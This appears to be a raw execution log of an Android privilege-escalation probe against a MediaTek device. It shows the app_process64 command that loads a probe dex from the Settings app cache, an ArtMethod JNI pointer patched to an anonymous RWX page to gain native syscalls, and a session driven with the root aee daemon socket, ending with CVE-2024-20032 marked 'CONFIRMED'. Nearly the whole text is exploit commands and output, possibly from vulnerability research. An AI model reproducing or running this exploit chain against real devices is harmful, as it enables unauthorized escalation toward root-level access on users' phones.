command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=8 --payload
probe=aee-session
dex_md5=cff9ea6c40c6f83f252395775631478b
dex_sha256=ab7c96cc07e0f00b52ec4709e19f20fa1157c8af4136c5d939d3149bf395caa3
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
cff9ea6c40c6f83f252395775631478b  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=24605 target_pid=24605 class=8 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x72d8f3b000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x72d8e6c000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x72d88b6c58
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x702ba1a2c0
    entry_point    = 0x10380008773fc568
[*] Patching data_ (JNI) → 0x72d8e6c000
    data_       = 0x72d8e6c000 ✓
    entry_point = 0x10380008773fc568 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=8 pid=24605 flags=0x0 payload=18
[session] IND bytes: 02 00 00 00 0b 00 00 00 1d 60 00 00 08 00 00 00 12 00 00 00 00 00 00 00
[session] REQ#0 type=0 cmd=2(REQ_TYPE) seq=0 payload=0
[session] REQ#1 type=0 cmd=3(REQ_PROCESS) seq=1 payload=0
[session] REQ#2 type=0 cmd=4(REQ_MODULE) seq=2 payload=0
[session] REQ#3 type=0 cmd=43(REQ_TRIG_TIME) seq=3 payload=0
[session] REQ#4 type=0 cmd=5(REQ_BACKTRACE) seq=4 payload=0
[session] REQ#5 type=2 cmd=16(IND_LOG_CLOSE) seq=0 payload=0
[session] daemon IND cmd=16(IND_LOG_CLOSE) — session CLOSED
[session] *** SUCCESS: 5 REQ/RSP exchanges on @com.mtk.aee.aed_64 ***
[result] CVE_2024_20032=CONFIRMED — system_app drove full session with root aee daemon

[phase-check] /data/vendor/aee_exp/
[aee_exp] 开始轮询，等待 aee_dumpstate 写入（最多40秒）...
[aee_exp] 40秒后仍为空
[result] DUMP_WRITTEN=NO — aee_dumpstate 可能因目标进程未真实崩溃而中止写入
